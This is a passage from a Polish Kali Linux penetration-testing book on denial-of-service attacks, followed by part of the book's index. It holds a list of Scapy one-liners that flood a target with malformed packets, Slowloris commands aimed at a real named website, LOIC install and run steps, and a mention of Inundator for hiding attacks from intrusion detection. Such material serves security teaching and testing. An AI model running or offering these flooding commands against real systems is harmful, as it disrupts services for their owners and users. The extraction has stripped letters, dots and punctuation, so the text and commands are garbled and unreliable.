ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych

Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece

W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia

send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)

Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

260

Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy

Nieprawid owa wersja protoko u IP

send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)

Nieprawid owa suma kontrolna pakietu TCP

send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)

send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)

Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)

send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)

Ustawiona tylko flaga FIN

send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)

Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2

send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka pakietu

send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)

ICMP Flood

send(IP(dst=10001)ICMP()iface=eth0count=2000)

Nieprawid owa suma kontrolna pakietu IP

send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)

Fragmentacja pakietoacutew IP

send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

261

roacuted owy adres IP taki sam jak docelowy adres IP

send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)

Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)

Brak pakietu warstwy L4

send(IP(dst=10001 src=10203040) iface=eth0 count=2000)

Jednocze nie ustawione flagi SYN i FIN

send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)

Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)

Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)

send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)

Slowloris

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

262

Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym

programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco

czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera

Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne

Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris

Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej

perl slowlorispl

W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)

perl slowlorispl -dns thesecuritybloggercom

Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)

Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)

Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

263

LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

264

narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki

Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa

Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej

apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs

Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej

mkdir loic

Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej

wget httpsrawgithubcomnicolargoloicinstaller masterloicsh

Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie

chmod 777 loicsh

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

265

Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej

loicsh install

Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie

loicsh update

Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie

loicsh run

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

266

U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny

Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP

Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding

Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane

DNSChef

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

267

Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne

Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera

SniffJoke

SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

268

SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force

Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)

Sk adnia wywo ania polecenia siege jest nast puj ca

siege [opcje] ltadres URL celugt

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

269

Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-

nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku

InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

270

wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS

TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych

Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci

PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce

W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia

W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew

Kup książkę Poleć książkę

Skorowidz

Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275

harmonogram 276zabezpiecze systemu 276

ALE 31analiza

bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych

zawieraj cychoprogramowanie firmware298

ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat

299zawarto ci plikoacutew PDF 299

da HTTP 203aplet Java 156aplikacje internetowe 23

b dy w zabezpieczeniach286

wykrywanie i mapowanie 241zakres testoacutew penetracyjnych

23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212

ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki

brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji

internetowych 147na parametry metod GET

i POST 131na protoko y komunikacyjne

256na serwery aplikacji

internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie

zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151

amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257

wykorzystuj ce przeci eniepo cze sieciowych 256

XSS 223 248z klonowaniem 151z u yciem narz dzi

penetracyjnych opartychna przegl darkach 236

audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301

Authentication hijacking 225Autopsy 295AV 31

BBackTrack 38badanie zasoboacutew sieci

komputerowych 65bazy danych 218BeEF 232

panel zarz dzania pakietu 234przechwycony system 235

bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272

a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania

i urz dze 274podstawowe wymogi 273

bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych

288 291narz dzia 293partycje 292suma kontrolna 294

Kup książkę Poleć książkę

Skorowidz

330

black-box 24 30BootKey 171 173Browser Exploitation

Framework 232brute-force 125 170

amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238

Intercept 241opcje konfiguracyjne 239

Burp Spider 241 244Burp Suite 238

Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty

CEH 311CISSP 31 193g oacutewnego urz du certyfikacji

106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282

chkrootkit 295chntpw 180

uruchomienie w Kali Linux182

ciasteczka 197edytowanie zawarto ci 199

201niezabezpieczone 208obrona przed

przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200

ci g zaburzaj cy 170Cisco Network Foundation

Protection 275CISSP 193Clickjacking 196

kod roacuted owy stron 197obrona przed atakiem 287

CmosPwd 190

Cookie Cadger 203dane o sesji 204

Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185

znaki specjalne 186CutyCapt 327czarne pude ko 24

DDBPwAudit 229dc3dd 293 297dd 291DDoS 256

kategorie atakoacutew 256obrona przed atakiem 285

Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128

raport 130Distributed Denial of Service

256DNS 267DNSChef 266dokumentacja 306DoS 256

kategorie atakoacutew 256obrona przed atakiem 285

dost p do systemualternatywny 37techniki XSS 225

dost pno 30Dradis 325Driftnet 217dsniff 212

nas uchiwaniei przechwytywaniepakietoacutew 213

uruchamianie 214dual-boot configuration 44

EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate

Authority 282Ettercap 214

lista celoacutew 216skanowanie sieci 216

Exploitation Tools 36 37 48exploity 92 113

Reserve_TCP Meterpreter156

Ffa szywe

adresy IP 285odpowiedzi DNS 267witryny 159 252

Ferret 209uruchamianie 210

FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84

utworzenie nowego projektu84

Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170

kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93

Ggenerator

hase 278adunkoacutew 132

GHDB 63GIT 250glosariusz 319

Kup książkę Poleć książkę

Skorowidz

331

Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246

instancja projektu 225

HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137

dost pu 250generowanie listy 185amanie 169

ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169

249si a 277w systemie Linux 173w systemie Windows 171

haszowanie 170z dodatkiem soli

kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125

uruchomienie 128

IICMP Echo Request 70identyfikacja

adresoacutew URL 227celoacutew za pomoc serweroacutew

DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci

188

iFrame 196Information Gathering 34 46informatyka ledcza 287

zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria

spo eczna 148wsteczna 48

ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142

Jj zyk SQL 218John the Ripper 137 173

domy lna konfiguracjacie ek 176

haszowanie 170amanie hase 174

proces 137amanie pliku hase 139

s owniki 138 177szybko dzia ania 138

Johnny 138amanie hase 174

opcje konfiguracyjneprogramu 175

s owniki 177uruchamianie 175

KKali Linux 15

aktualizacja pakietu SET 150instalowanie 40

pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania

sprz towe 40narz dzia dost pne

w systemie 46Network Install 40proces konfigurowania

partycji dysku 42publiczny adres IP 225s owniki 129

uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39

wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147

aplikacji internetowych 169191

HTTP 262klonowanie

rodowiska 278witryny internetowej 66 153

158 251 279klucze uruchamiania systemu

171 173komunikaty

ICMP 70o up ywie czasu dania 70

kopiowanie plikoacutew SAMi SYSTEM z hosta 172

LLinux amanie hase 173lista

adresoacutew URL 227potencjalnych hase 185

listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263

tryby 266luki w zabezpieczeniach

aktualizacja bazy 276aplikacji internetowych 245

254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty

elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92

LVM 43

Kup książkę Poleć książkę

Skorowidz

332

adunek 117amanie hase 137 169

bezp atne us ugi sieciowe190

haszowanych 189maska 189narz dzia 174przechowywanych w plikach

systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper

174zabezpieczaj cych BIOS

komputera 190cza modyfikacja 196

MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74

zadania 76Maltego CaseFile 326man-in-the-middle 139 211

obrona przed atakiem 281przeprowadzanie manualne

212maska 189mechanizmy

HSTS 140klonowania 153obronne 231 271

testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego

po czenia SSL 257usuwania mi kkich b doacutew

404 93mened er LVM 43metadane 83

wyszukiwanie i analiza 83Metasploit 113 154

skanowanie sieci lokalnej 114wersja konsolowa 114

meterpreter 151uruchomienie sesji 156wykorzystanie 156

metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24

310 323metody

pojedynczegouwierzytelniania 194

szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem

Windows 172

Nnag oacutewki X-Frame-Options 287narz dzia

do klonowania witryn 281do amania hase 174do przechwytywania sesji

198do przeprowadzania atakoacutew

DoSDDoS 285ledcze 295

wspomagaj ce tworzenieraportoacutew 325

nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228

nazwy DNS 71Nessus 162

HomeFeed 163instalowanie w systemie

Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164

Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe

263Nmap 76

agresywne skanowanie 79graficzny interfejs

u ytkownika 77okno wynikoacutew skanowania 82opcje 79

NoScript 287no niki danych 288

Oobrona przed atakami

Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek

286SSLstrip 284

ocena ryzyka 30formu y 31okna serwisowe 277

ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183

uruchomienie w Kali Linux184

osobista weryfikacja to samo ci194

oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu

poufno ci 307otwarta implementacja sterownikoacutew

kart graficznych 178Owasp-Zap 105 245

automatyczne logowanie 110konfigurowanie przegl darki

108mechanizm aktualizacji ca ego

pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111

PPAE 39pakiety

ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259

pami masowa urz dze 289partycje 172

wymiany 291Pasco 299Password Attacks 37 47 174Patator 229

Kup książkę Poleć książkę

Skorowidz

333

pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki

binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180

wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie

299poczta elektroniczna 123

fa szywe wiadomo ci 159podatno na atak 29

aktualizacja bazy 276aplikacji internetowych 245

254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226

podnoszenie uprawnie 37podstawowe wymogi

bezpiecze stwa 303podsumowanie ustale 313polecenia

apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70

getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116

polityka zarz dzania has ami 277po czenia

HTTP 268HTTPS 268

po czeniaTCP 267troacutejetapowe 79VPN 282

poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276

porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142

poufno 30poziom zabezpiecze

minimalny 274podstawowy 274

PREROUTING 143

Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty

Emily 59Gruyere 224 246

promiscuous mode 47Protocol Attacks 256protoko y

8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281

ProxyStrike 98robot sieciowy 100

przechwytywanieciasteczek 197 209 286danych logowania

u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych

w sieci 217pakietoacutew 213

sieciowych 210TCP 259

przechwytywaniepo cze 161

TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267

270sesji 197 208 233

narz dzia 198przegl d projektu 306przegl darki 232

ochrona przed atakami 236zabezpieczenia 249

przekazywanie pakietoacutew IP 142212

przekierowaniepo cze 284portoacutew komunikacyjnych

